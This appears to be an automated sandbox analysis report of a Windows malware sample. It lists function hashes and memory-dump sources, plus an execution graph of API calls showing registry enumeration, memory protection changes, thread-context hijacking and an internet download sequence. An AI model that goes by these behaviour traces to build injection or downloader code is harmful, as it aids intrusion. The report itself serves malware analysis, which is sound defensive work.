                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c50278b44681242fbc20550a46f597be29955c7352911fc8a5854bc7bd09900e
                                                                                                                                                                                            • Instruction ID: f70480306258a667ce419dcb359f7e1f87f6b5a86fd49f6747fa3009fc53c4d9
                                                                                                                                                                                            • Opcode Fuzzy Hash: c50278b44681242fbc20550a46f597be29955c7352911fc8a5854bc7bd09900e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C01493150DB894FD785E718D4605A67BE2EF96210F88417FE08EC3396CE65D9088782
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24CF6F Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 83a4d98d8b5ac814856af66afd65a30cd292968076e077e400707e3aa8f5b1fb
                                                                                                                                                                                            • Instruction ID: 1a88e89f254e1e9b8e3ab0d1a1c4cc55109ea04ab8f49469014401193e635abe
                                                                                                                                                                                            • Opcode Fuzzy Hash: 83a4d98d8b5ac814856af66afd65a30cd292968076e077e400707e3aa8f5b1fb
                                                                                                                                                                                            • Instruction Fuzzy Hash: D101A23140C7848FD361EB28C458456BFF0FF99214B148AAFE88CC72A1D638E944CB42
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC241A39 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6689af61d779afb686c604b72b41c261a0279282039d8c615668077687f17117
                                                                                                                                                                                            • Instruction ID: aa8aaa2f1a3399ffd053ea4323993aaab7bfcbb8c1f05a69126bf9cc390296e6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6689af61d779afb686c604b72b41c261a0279282039d8c615668077687f17117
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D01F47184D3898FE342EB7888150A97FB0EF46200F4540F7D459CB1A2E9285988C742
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249EB0 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d0a0790a1da2da349bd3830716c265a097438ed17f0d3cf8a161e1bf6bf3ec06
                                                                                                                                                                                            • Instruction ID: e17dce0aec1de7aabbdea51f35ae2e45b38c89314f391e207b0d3f83db6a0938
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0a0790a1da2da349bd3830716c265a097438ed17f0d3cf8a161e1bf6bf3ec06
                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F0A735618D0D9F96B5EB2CD44497373E1FB98310315467AD45FC3668DE25FC468780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A169 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e9785091bb7fa08ca28ac78f3fb03ebfc0ea6777f86951437276c83f6c847fd6
                                                                                                                                                                                            • Instruction ID: 196eba328e0c7caabd5561780932df17dbde8f0b23ebc140f969aa6217fae682
                                                                                                                                                                                            • Opcode Fuzzy Hash: e9785091bb7fa08ca28ac78f3fb03ebfc0ea6777f86951437276c83f6c847fd6
                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F0E231A0EA888FCB45B73C98591983BE0EF4A22174941F6E00CCB2A3DD28DC098381
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC2404A0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 82d4945abe56058a8566136de00644db73d05d73e91c20825df140fc48d05571
                                                                                                                                                                                            • Instruction ID: aa52cfd53113ab09fdf632de70fe6b1eb04e153346065567f3a14f7d9604c4b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 82d4945abe56058a8566136de00644db73d05d73e91c20825df140fc48d05571
                                                                                                                                                                                            • Instruction Fuzzy Hash: 15F0E220E4E94A4FF3A9B77944162BA38C19F8612070040BED44DC32D9EC9E9C8E43C2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A08D Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c38b64f65963c02a44bfdac514ef14d8e93836e0925b6b52f959eac229eba376
                                                                                                                                                                                            • Instruction ID: dd0a52074aa430807e8eb5a8159e9ea4bb88438f7770a64c853b89b75d42f23e
                                                                                                                                                                                            • Opcode Fuzzy Hash: c38b64f65963c02a44bfdac514ef14d8e93836e0925b6b52f959eac229eba376
                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F0E27081C3C84FC70A8F2848650AABFE0FF96500F0442BFE4C6C6652DE7595058B83
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC241CCB Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: abfd7cfdb6b9ef3cb6600813346fdcd5c451ef02f9dd5297f9e89cc91aaacab8
                                                                                                                                                                                            • Instruction ID: c78a2a8391b1eeba54000ffd0acdb63251a0fc81e71ef7ed4266fee028309182
                                                                                                                                                                                            • Opcode Fuzzy Hash: abfd7cfdb6b9ef3cb6600813346fdcd5c451ef02f9dd5297f9e89cc91aaacab8
                                                                                                                                                                                            • Instruction Fuzzy Hash: C1F01C7079A6098FE385FB7885592B936E2EF9E2107404479C80ECB3A6DE689C4D8750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC240CED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f94dc85581047ffde6485fc5817cf1d0cc13b4583341cf579f3fe65eb4a8bc58
                                                                                                                                                                                            • Instruction ID: 9bf05c784225f57b9a65cfe1d956b343180a73a87bb648284fc4b69c8629f4f5
                                                                                                                                                                                            • Opcode Fuzzy Hash: f94dc85581047ffde6485fc5817cf1d0cc13b4583341cf579f3fe65eb4a8bc58
                                                                                                                                                                                            • Instruction Fuzzy Hash: 91E0EC52D0EA554BF2B5727865A71F86F91DF5511070401BBD50EC61C7EC0D9C8D03D2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24CF90 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c88190015505a60b810918cbe7feebb0db139e2e0c31d08e1ba1ef61cbf1def6
                                                                                                                                                                                            • Instruction ID: af5a864ff166c4ba1302457c46bc968c2f3c9abc7bafd8c55d8cbc25780d1812
                                                                                                                                                                                            • Opcode Fuzzy Hash: c88190015505a60b810918cbe7feebb0db139e2e0c31d08e1ba1ef61cbf1def6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 69F01231518B098FD790FF28D044966B7E0FF98319F108A6FE89DD7274DA34D9858B81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC240D3D Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 23adb3d936c6c34801c65f4f67eb181918ac7766a8ba6f476e6182a55f36ec36
                                                                                                                                                                                            • Instruction ID: 941ce469fbed5fe9bc1f071c89965f7092662cba3c57435a06fc977cb4007a6d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 23adb3d936c6c34801c65f4f67eb181918ac7766a8ba6f476e6182a55f36ec36
                                                                                                                                                                                            • Instruction Fuzzy Hash: D1E0D85291EA948FE2B9A31C45761A47EA0EB16100B0540EBC04DCB1D6E5449C4C43C2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC242AC2 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9c17953070ca7b776b1f56231e8be4d708f897b6e5703caa2f5fbeb92f94e74a
                                                                                                                                                                                            • Instruction ID: ff5eda04c39f62bdb43ee39c6cf060b4259b7551b7034ac1ce70687ce7383e2d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c17953070ca7b776b1f56231e8be4d708f897b6e5703caa2f5fbeb92f94e74a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7FE0EC32A1981DCFEB45EB89D4466FCB7B1FB89221F504072D50EE3285C928A4598791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC241298 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f6e0f6d7ecc7bf12c405c8435225d29585aad94baae02a266677eccfaed06aae
                                                                                                                                                                                            • Instruction ID: b36c19c06e4e8a562fe901460a207b2552c36deb208a7d8aacee8f878682ad52
                                                                                                                                                                                            • Opcode Fuzzy Hash: f6e0f6d7ecc7bf12c405c8435225d29585aad94baae02a266677eccfaed06aae
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7FD05B70928B0443A7086F3C4C0A039B7D1F794506F94963FA84961760DE6AA4445183
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24B168 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 386be1f4482e5da3a204495a9cb8b2edef977aa89a49d0d8de442fcee2f5196d
                                                                                                                                                                                            • Instruction ID: 539e4d33a5dceca2e8a10e56bfa12820a95bc5e8923d23d6cd4114dc0cdef7be
                                                                                                                                                                                            • Opcode Fuzzy Hash: 386be1f4482e5da3a204495a9cb8b2edef977aa89a49d0d8de442fcee2f5196d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 84D0973044B645CFE71ABF3080550973BE0AF0B220BC848FDD8488E356C1BE948E9342
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC2408B1 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 68b21205613f52d831b86b31445755603086703cd00d0a1b5db955606535b8ff
                                                                                                                                                                                            • Instruction ID: 2a3f55d7815772e27a122ad8afea9b02ac7c72cc3392cad2dbad14205e3ae804
                                                                                                                                                                                            • Opcode Fuzzy Hash: 68b21205613f52d831b86b31445755603086703cd00d0a1b5db955606535b8ff
                                                                                                                                                                                            • Instruction Fuzzy Hash: D3B012901472455FC342FD7004210153DD05F4F020342049D4041DB660C0884C0B4311
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:2.9%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:98%
                                                                                                                                                                                            Signature Coverage:24%
                                                                                                                                                                                            Total number of Nodes:204
                                                                                                                                                                                            Total number of Limit Nodes:19
                                                                                                                                                                                            execution_graph 16163 401980 16181 4036e0 16163->16181 16166 401edb fclose 16168 4019b9 16166->16168 16167 401f18 16169 401f1e GetVolumeInformationA 16167->16169 16168->16166 16168->16167 16171 401bf0 SleepEx 16168->16171 16174 401ae1 GetVolumeInformationA 16168->16174 16178 401b7a InternetOpenA 16168->16178 16179 401d40 16168->16179 16170 401f86 16169->16170 16177 401f66 16169->16177 16172 401fb4 InternetOpenA InternetOpenUrlA 16170->16172 16171->16168 16173 40203a InternetReadFile 16172->16173 16180 40201f 16172->16180 16175 402030 16173->16175 16176 402052 InternetCloseHandle 16173->16176 16174->16168 16174->16177 16175->16173 16175->16176 16176->16180 16178->16168 16182 401996 GetConsoleWindow 16181->16182 16182->16168 16183 2109c3c27fc 16185 2109c3c2842 16183->16185 16184 2109c3c28a8 16185->16184 16187 2109c3c3844 16185->16187 16188 2109c3c3866 16187->16188 16189 2109c3c3851 StrCmpNIW 16187->16189 16188->16185 16189->16188 16190 2109c3c1abc 16195 2109c3c1628 GetProcessHeap HeapAlloc 16190->16195 16192 2109c3c1ad2 Sleep SleepEx 16193 2109c3c1acb 16192->16193 16193->16192 16194 2109c3c1598 StrCmpIW StrCmpW 16193->16194 16194->16193 16246 2109c3c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16195->16246 16197 2109c3c1650 16247 2109c3c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16197->16247 16199 2109c3c1658 16248 2109c3c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16199->16248 16201 2109c3c1661 16249 2109c3c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16201->16249 16203 2109c3c166a 16250 2109c3c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16203->16250 16205 2109c3c1673 16251 2109c3c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16205->16251 16207 2109c3c167c 16252 2109c3c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16207->16252 16209 2109c3c1685 16253 2109c3c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16209->16253 16211 2109c3c168e RegOpenKeyExW 16212 2109c3c18a6 16211->16212 16213 2109c3c16c0 RegOpenKeyExW 16211->16213 16212->16193 16214 2109c3c16ff RegOpenKeyExW 16213->16214 16215 2109c3c16e9 16213->16215 16217 2109c3c173a RegOpenKeyExW 16214->16217 16218 2109c3c1723 16214->16218 16260 2109c3c12bc RegQueryInfoKeyW 16215->16260 16221 2109c3c175e 16217->16221 16222 2109c3c1775 RegOpenKeyExW 16217->16222 16254 2109c3c104c RegQueryInfoKeyW 16218->16254 16224 2109c3c12bc 16 API calls 16221->16224 16225 2109c3c1799 16222->16225 16226 2109c3c17b0 RegOpenKeyExW 16222->16226 16229 2109c3c176b RegCloseKey 16224->16229 16230 2109c3c12bc 16 API calls 16225->16230 16227 2109c3c17eb RegOpenKeyExW 16226->16227 16228 2109c3c17d4 16226->16228 16232 2109c3c180f 16227->16232 16233 2109c3c1826 RegOpenKeyExW 16227->16233 16231 2109c3c12bc 16 API calls 16228->16231 16229->16222 16234 2109c3c17a6 RegCloseKey 16230->16234 16235 2109c3c17e1 RegCloseKey 16231->16235 16236 2109c3c104c 6 API calls 16232->16236 16237 2109c3c184a 16233->16237 16238 2109c3c1861 RegOpenKeyExW 16233->16238 16234->16226 16235->16227 16239 2109c3c181c RegCloseKey 16236->16239 16240 2109c3c104c 6 API calls 16237->16240 16241 2109c3c189c RegCloseKey 16238->16241 16242 2109c3c1885 16238->16242 16239->16233 16243 2109c3c1857 RegCloseKey 16240->16243 16241->16212 16244 2109c3c104c 6 API calls 16242->16244 16243->16238 16245 2109c3c1892 RegCloseKey 16244->16245 16245->16241 16246->16197 16247->16199 16248->16201 16249->16203 16250->16205 16251->16207 16252->16209 16253->16211 16255 2109c3c10bf 16254->16255 16256 2109c3c11b5 RegCloseKey 16254->16256 16255->16256 16257 2109c3c10cf RegEnumValueW 16255->16257 16256->16217 16258 2109c3c1125 16257->16258 16258->16256 16258->16257 16259 2109c3c114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 16258->16259 16259->16258 16261 2109c3c148a RegCloseKey 16260->16261 16262 2109c3c1327 GetProcessHeap HeapAlloc 16260->16262 16261->16214 16263 2109c3c1476 GetProcessHeap HeapFree 16262->16263 16264 2109c3c1352 RegEnumValueW 16262->16264 16263->16261 16265 2109c3c13a5 16264->16265 16265->16263 16265->16264 16267 2109c3c141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 16265->16267 16268 2109c3c13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 16265->16268 16269 2109c3c152c 16265->16269 16267->16265 16268->16267 16270 2109c3c157c 16269->16270 16273 2109c3c1546 16269->16273 16270->16265 16271 2109c3c155d StrCmpIW 16271->16273 16272 2109c3c1565 StrCmpW 16272->16273 16273->16270 16273->16271 16273->16272 16274 2109c3c202c 16275 2109c3c205d 16274->16275 16276 2109c3c2173 16275->16276 16283 2109c3c2081 16275->16283 16287 2109c3c213e 16275->16287 16277 2109c3c2178 16276->16277 16278 2109c3c21e7 16276->16278 16295 2109c3c2f04 GetProcessHeap HeapAlloc 16277->16295 16280 2109c3c21ec 16278->16280 16278->16287 16282 2109c3c2f04 11 API calls 16280->16282 16281 2109c3c20b9 StrCmpNIW 16281->16283 16285 2109c3c2190 16282->16285 16283->16281 16284 2109c3c20e0 16283->16284 16283->16287 16284->16283 16288 2109c3c1bf4 16284->16288 16285->16287 16289 2109c3c1c8f 16288->16289 16290 2109c3c1c1b GetProcessHeap HeapAlloc 16288->16290 16289->16284 16290->16289 16291 2109c3c1c56 16290->16291 16292 2109c3c1c77 GetProcessHeap HeapFree 16291->16292 16293 2109c3c152c 2 API calls 16291->16293 16292->16289 16294 2109c3c1c6e 16293->16294 16294->16292 16299 2109c3c2f57 16295->16299 16296 2109c3c3015 GetProcessHeap HeapFree 16296->16285 16297 2109c3c3010 16297->16296 16298 2109c3c2fa2 StrCmpNIW 16298->16299 16299->16296 16299->16297 16299->16298 16300 2109c3c1bf4 6 API calls 16299->16300 16300->16299 16301 2109c3c2b2c 16303 2109c3c2b9d 16301->16303 16302 2109c3c2ee0 16303->16302 16304 2109c3c2bc9 GetModuleHandleA 16303->16304 16305 2109c3c2bed 16304->16305 16306 2109c3c2bdb GetProcAddress 16304->16306 16305->16302 16307 2109c3c2c14 StrCmpNIW 16305->16307 16306->16305 16307->16302 16311 2109c3c2c39 16307->16311 16308 2109c3c199c 6 API calls 16308->16311 16309 2109c3c2e05 lstrlenW 16309->16311 16310 2109c3c2d4b lstrlenW 16310->16311 16311->16302 16311->16308 16311->16309 16311->16310 16312 2109c3c3844 StrCmpNIW 16311->16312 16313 2109c3c152c StrCmpIW StrCmpW 16311->16313 16312->16311 16313->16311 16314 4014e0 16315 4014f6 16314->16315 16318 401180 16315->16318 16317 4014fb 16319 4011b4 16318->16319 16321 401268 16318->16321 16320 40124c SetUnhandledExceptionFilter 16319->16320 16319->16321 16320->16321 16321->16317 16322 2109c3c554d 16324 2109c3c5554 16322->16324 16323 2109c3c55bb 16324->16323 16325 2109c3c5637 VirtualProtect 16324->16325 16326 2109c3c5671 16325->16326 16327 2109c3c5663 GetLastError 16325->16327 16327->16326 16328 2109c3c28c8 16329 2109c3c290e 16328->16329 16330 2109c3c2970 16329->16330 16331 2109c3c3844 StrCmpNIW 16329->16331 16331->16329 16332 2109c3c3ab9 16337 2109c3c3a06 16332->16337 16333 2109c3c3a70 16334 2109c3c3a56 VirtualQuery 16334->16333 16334->16337 16335 2109c3c3a8a VirtualAlloc 16335->16333 16336 2109c3c3abb GetLastError 16335->16336 16336->16333 16336->16337 16337->16333 16337->16334 16337->16335 16338 2109c39273c 16339 2109c39276a 16338->16339 16340 2109c3927c5 VirtualAlloc 16339->16340 16341 2109c3927ec 16339->16341 16340->16341 16342 2109c3c5cf0 16343 2109c3c5cfd 16342->16343 16344 2109c3c5d09 16343->16344 16347 2109c3c5e1a 16343->16347 16345 2109c3c5d8d 16344->16345 16346 2109c3c5d3e 16344->16346 16348 2109c3c5d66 SetThreadContext 16346->16348 16349 2109c3c5e41 VirtualProtect FlushInstructionCache 16347->16349 16351 2109c3c5efe 16347->16351 16348->16345 16349->16347 16350 2109c3c5f1e 16360 2109c3c4df0 GetCurrentProcess 16350->16360 16351->16350 16364 2109c3c43e0 16351->16364 16354 2109c3c5f23 16355 2109c3c5f77 16354->16355 16356 2109c3c5f37 ResumeThread 16354->16356 16368 2109c3c7940 16355->16368 16357 2109c3c5f6b 16356->16357 16357->16354 16359 2109c3c5fbf 16361 2109c3c4e0c 16360->16361 16362 2109c3c4e22 VirtualProtect FlushInstructionCache 16361->16362 16363 2109c3c4e53 16361->16363 16362->16361 16363->16354 16366 2109c3c43fc 16364->16366 16365 2109c3c445f 16365->16350 16366->16365 16367 2109c3c4412 VirtualFree 16366->16367 16367->16366 16369 2109c3c7949 16368->16369 16370 2109c3c812c IsProcessorFeaturePresent 16369->16370 16371 2109c3c7954 16369->16371 16372 2109c3c8144 16370->16372 16371->16359 16375 2109c3c8320 16372->16375 16374 2109c3c8157 16374->16359 16378 2109c3c8331 capture_previous_context 16375->16378 16376 2109c3c833a RtlLookupFunctionEntry 16377 2109c3c8389 16376->16377 16376->16378 16377->16374 16378->16376 16378->16377 16379 2109c3cfa50 16390 2109c3cc99c EnterCriticalSection 16379->16390 16381 2109c3cfa60 16382 2109c3d1d0c 26 API calls 16381->16382 16383 2109c3cfa69 16382->16383 16384 2109c3cf858 28 API calls 16383->16384 16389 2109c3cfa77 16383->16389 16386 2109c3cfa72 16384->16386 16385 2109c3cc9f0 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 16387 2109c3cfa83 16385->16387 16388 2109c3cf948 GetStdHandle GetFileType 16386->16388 16388->16389 16389->16385 16391 2109c3d6240 16390->16391

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 00401980 Relevance: 33.8, APIs: 9, Strings: 10, Instructions: 538networkCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
